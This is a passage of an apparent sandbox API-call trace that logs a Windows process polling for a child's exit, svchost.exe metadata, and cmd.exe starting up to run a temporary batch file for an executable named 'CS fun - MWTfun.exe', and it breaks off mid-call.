(dwMilliseconds=0x19) [0308.184] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.184] Sleep (dwMilliseconds=0x19) [0308.235] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.236] Sleep (dwMilliseconds=0x19) [0308.381] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.381] Sleep (dwMilliseconds=0x19) [0308.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.425] Sleep (dwMilliseconds=0x19) [0308.453] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.454] Sleep (dwMilliseconds=0x19) [0308.480] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.480] Sleep (dwMilliseconds=0x19) [0308.520] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.520] Sleep (dwMilliseconds=0x19) [0308.568] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.585] Sleep (dwMilliseconds=0x19) [0308.620] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.620] Sleep (dwMilliseconds=0x19) [0308.654] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.654] Sleep (dwMilliseconds=0x19) [0308.681] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.681] Sleep (dwMilliseconds=0x19) [0308.727] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.727] Sleep (dwMilliseconds=0x19) Thread: id = 2 os_tid = 0x1158 Thread: id = 3 os_tid = 0x1018 Thread: id = 4 os_tid = 0x1008 Thread: id = 5 os_tid = 0x113c Thread: id = 6 os_tid = 0x1138 Thread: id = 7 os_tid = 0x1128 Thread: id = 8 os_tid = 0xe98 Thread: id = 9 os_tid = 0x1004 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 10 os_tid = 0x9bc Thread: id = 11 os_tid = 0x7ec Thread: id = 12 os_tid = 0x770 Thread: id = 13 os_tid = 0x7d8 Thread: id = 14 os_tid = 0x698 Thread: id = 15 os_tid = 0x690 Thread: id = 16 os_tid = 0x5fc Thread: id = 17 os_tid = 0x5f8 Thread: id = 18 os_tid = 0x5f4 Thread: id = 19 os_tid = 0x5b4 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x17728000" os_pid = "0x1190" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe70" cmd_line = "\"C:\\WINDOWS\\sysnative\\cmd.exe\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0xeb4 [0097.039] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff66c590000 [0097.039] __set_app_type (_Type=0x1) [0097.039] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff66c5a6d00) returned 0x0 [0097.039] __getmainargs (in: _Argc=0x7ff66c5c9200, _Argv=0x7ff66c5c9208, _Env=0x7ff66c5c9210, _DoWildCard=0, _StartInfo=0x7ff66c5c921c | out: _Argc=0x7ff66c5c9200, _Argv=0x7ff66c5c9208, _Env=0x7ff66c5c9210) returned 0 [0097.039] _onexit (_Func=0x7ff66c5a7fd0) returned 0x7ff66c5a7fd0 [0097.039] _onexit (_Func=0x7ff66c5a7fe0) returned 0x7ff66c5a7fe0 [0097.040] _onexit (_Func=0x7ff66c5a7ff0) returned 0x7ff66c5a7ff0 [0097.040] _onexit (_Func=0x7ff66c5a8000) returned 0x7ff66c5a8000 [0097.040] _onexit (_Func=0x7ff66c5a8010) returned 0x7ff66c5a8010 [0097.041] _onexit (_Func=0x7ff66c5a8020) returned 0x7ff66c5a8020 [0097.041] GetCurrentThreadId () returned 0xeb4 [0097.041] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb4) returned 0x7c [0097.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0097.041] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0097.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0097.049] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.049] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa6cf4ff768 | out: phkResult=0xa6cf4ff768*=0x0) returned 0x2 [0097.050] VirtualQuery (in: lpAddress=0xa6cf4ff754, lpBuffer=0xa6cf4ff6d0, dwLength=0x30 | out: lpBuffer=0xa6cf4ff6d0*(BaseAddress=0xa6cf4ff000, AllocationBase=0xa6cf400000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0097.050] VirtualQuery (in: lpAddress=0xa6cf400000, lpBuffer=0xa6cf4ff6d0, dwLength=0x30 | out: lpBuffer=0xa6cf4ff6d0*(BaseAddress=0xa6cf400000, AllocationBase=0xa6cf400000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0097.050] VirtualQuery (in: lpAddress=0xa6cf401000, lpBuffer=0xa6cf4ff6d0, dwLength=0x30 | out: lpBuffer=0xa6cf4ff6d0*(BaseAddress=0xa6cf401000, AllocationBase=0xa6cf400000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0097.050] VirtualQuery (in: lpAddress=0xa6cf404000, lpBuffer=0xa6cf4ff6d0, dwLength=0x30 | out: lpBuffer=0xa6cf4ff6d0*(BaseAddress=0xa6cf404000, AllocationBase=0xa6cf400000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0097.050] VirtualQuery (in: lpAddress=0xa6cf500000, lpBuffer=0xa6cf4ff6d0, dwLength=0x30 | out: lpBuffer=0xa6cf4ff6d0*(BaseAddress=0xa6cf500000, AllocationBase=0xa6cf500000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0097.050] GetConsoleOutputCP () returned 0x1b5 [0097.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0097.058] SetConsoleCtrlHandler (HandlerRoutine=0x7ff66c5b8150, Add=1) returned 1 [0097.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.058] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc04 | out: lpMode=0x7ff66c5cfc04) returned 1 [0097.060] _get_osfhandle (_FileHandle=0) returned 0x4c [0097.060] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc00 | out: lpMode=0x7ff66c5cfc00) returned 1 [0097.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.072] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x0) returned 1 [0097.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.087] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0097.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.128] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0097.186] _get_osfhandle (_FileHandle=0) returned 0x4c [0097.186] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0097.195] _get_osfhandle (_FileHandle=0) returned 0x4c [0097.195] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0097.253] GetEnvironmentStringsW () returned 0x21ed8c75c10* [0097.254] GetProcessHeap () returned 0x21ed8c70000 [0097.254] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaca) returned 0x21ed8c766f0 [0097.254] FreeEnvironmentStringsA (penv="A") returned 1 [0097.254] GetProcessHeap () returned 0x21ed8c70000 [0097.254] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8) returned 0x21ed8c75c10 [0097.254] GetEnvironmentStringsW () returned 0x21ed8c771d0* [0097.254] GetProcessHeap () returned 0x21ed8c70000 [0097.254] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaca) returned 0x21ed8c77cb0 [0097.254] FreeEnvironmentStringsA (penv="A") returned 1 [0097.254] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa6cf4fe618 | out: phkResult=0xa6cf4fe618*=0x88) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x0, lpData=0xa6cf4fe630*=0x4, lpcbData=0xa6cf4fe614*=0x1000) returned 0x2 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x1, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x0, lpData=0xa6cf4fe630*=0x1, lpcbData=0xa6cf4fe614*=0x1000) returned 0x2 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x0, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x40, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x40, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x0, lpData=0xa6cf4fe630*=0x40, lpcbData=0xa6cf4fe614*=0x1000) returned 0x2 [0097.255] RegCloseKey (hKey=0x88) returned 0x0 [0097.255] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa6cf4fe618 | out: phkResult=0xa6cf4fe618*=0x88) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x0, lpData=0xa6cf4fe630*=0x40, lpcbData=0xa6cf4fe614*=0x1000) returned 0x2 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x1, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x0, lpData=0xa6cf4fe630*=0x1, lpcbData=0xa6cf4fe614*=0x1000) returned 0x2 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x0, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x9, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x4, lpData=0xa6cf4fe630*=0x9, lpcbData=0xa6cf4fe614*=0x4) returned 0x0 [0097.255] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa6cf4fe610, lpData=0xa6cf4fe630, lpcbData=0xa6cf4fe614*=0x1000 | out: lpType=0xa6cf4fe610*=0x0, lpData=0xa6cf4fe630*=0x9, lpcbData=0xa6cf4fe614*=0x1000) returned 0x2 [0097.255] RegCloseKey (hKey=0x88) returned 0x0 [0097.255] time (in: timer=0x0 | out: timer=0x0) returned 0x5e98a81b [0097.255] srand (_Seed=0x5e98a81b) [0097.255] GetCommandLineW () returned="\"C:\\WINDOWS\\sysnative\\cmd.exe\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"" [0097.255] malloc (_Size=0x4000) returned 0x21ed8e45540 [0097.256] GetCommandLineW () returned="\"C:\\WINDOWS\\sysnative\\cmd.exe\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"\"" [0097.256] malloc (_Size=0xffce) returned 0x21ed8e50080 [0097.256] ??_V@YAXPEAX@Z () returned 0x21ed8e50080 [0097.257] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0097.257] malloc (_Size=0xffce) returned 0x21ed8e60060 [0097.257] ??_V@YAXPEAX@Z () returned 0x21ed8e60060 [0097.258] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x21ed8e60060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0097.258] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0097.258] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0097.258] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0097.258] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0097.258] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0097.258] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0097.258] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0097.258] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0097.258] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0097.259] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0097.259] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0097.259] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0097.259] GetProcessHeap () returned 0x21ed8c70000 [0097.259] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c766f0) returned 1 [0097.259] GetEnvironmentStringsW () returned 0x21ed8c75c30* [0097.259] GetProcessHeap () returned 0x21ed8c70000 [0097.259] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae2) returned 0x21ed8c76720 [0097.259] FreeEnvironmentStringsA (penv="A") returned 1 [0097.259] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0097.259] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0097.259] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0097.259] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0097.259] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0097.259] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0097.259] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0097.259] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0097.259] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0097.259] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0097.259] malloc (_Size=0xffce) returned 0x21ed8e70040 [0097.260] ??_V@YAXPEAX@Z () returned 0x21ed8e70040 [0097.260] GetProcessHeap () returned 0x21ed8c70000 [0097.260] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c787c0 [0097.260] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e70040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0097.261] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x21ed8e70040, lpFilePart=0xa6cf4ff190 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4ff190*="Desktop") returned 0x17 [0097.261] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0097.261] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4feec0 | out: lpFindFileData=0xa6cf4feec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c78810 [0097.261] FindClose (in: hFindFile=0x21ed8c78810 | out: hFindFile=0x21ed8c78810) returned 1 [0097.262] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4feec0 | out: lpFindFileData=0xa6cf4feec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c78810 [0097.262] FindClose (in: hFindFile=0x21ed8c78810 | out: hFindFile=0x21ed8c78810) returned 1 [0097.262] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4feec0 | out: lpFindFileData=0xa6cf4feec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x454b4664, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x454b4664, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c78810 [0097.262] FindClose (in: hFindFile=0x21ed8c78810 | out: hFindFile=0x21ed8c78810) returned 1 [0097.262] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0097.262] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0097.262] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0097.262] GetProcessHeap () returned 0x21ed8c70000 [0097.262] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c76720) returned 1 [0097.262] GetEnvironmentStringsW () returned 0x21ed8c79340* [0097.262] GetProcessHeap () returned 0x21ed8c70000 [0097.262] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb1a) returned 0x21ed8c75c30 [0097.262] FreeEnvironmentStringsA (penv="=") returned 1 [0097.263] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0097.263] GetProcessHeap () returned 0x21ed8c70000 [0097.263] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c787c0) returned 1 [0097.263] ??_V@YAXPEAX@Z () returned 0x1 [0097.263] ??_V@YAXPEAX@Z () returned 0x1 [0097.263] GetProcessHeap () returned 0x21ed8c70000 [0097.263] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4016) returned 0x21ed8c79340 [0097.263] GetProcessHeap () returned 0x21ed8c70000 [0097.263] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x134) returned 0x21ed8c70fc0 [0097.263] GetProcessHeap () returned 0x21ed8c70000 [0097.263] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8c7d360 [0097.264] GetProcessHeap () returned 0x21ed8c70000 [0097.264] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8c81380 [0097.264] GetProcessHeap () returned 0x21ed8c70000 [0097.264] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c79340) returned 1 [0097.264] GetConsoleOutputCP () returned 0x1b5 [0097.287] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0097.287] GetUserDefaultLCID () returned 0x409 [0097.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff66c5cbb78, cchData=8 | out: lpLCData=":") returned 2 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa6cf4ff550, cchData=128 | out: lpLCData="0") returned 2 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa6cf4ff550, cchData=128 | out: lpLCData="0") returned 2 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa6cf4ff550, cchData=128 | out: lpLCData="1") returned 2 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff66c5cbb68, cchData=8 | out: lpLCData="/") returned 2 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff66c5cbb00, cchData=32 | out: lpLCData="Mon") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff66c5cbac0, cchData=32 | out: lpLCData="Tue") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff66c5cba80, cchData=32 | out: lpLCData="Wed") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff66c5cba40, cchData=32 | out: lpLCData="Thu") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff66c5cba00, cchData=32 | out: lpLCData="Fri") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff66c5cb9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff66c5cb980, cchData=32 | out: lpLCData="Sun") returned 4 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff66c5cbb58, cchData=8 | out: lpLCData=".") returned 2 [0097.288] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff66c5cbb40, cchData=8 | out: lpLCData=",") returned 2 [0097.288] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0097.289] GetProcessHeap () returned 0x21ed8c70000 [0097.289] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x0, Size=0x20c) returned 0x21ed8c71170 [0097.289] GetConsoleTitleW (in: 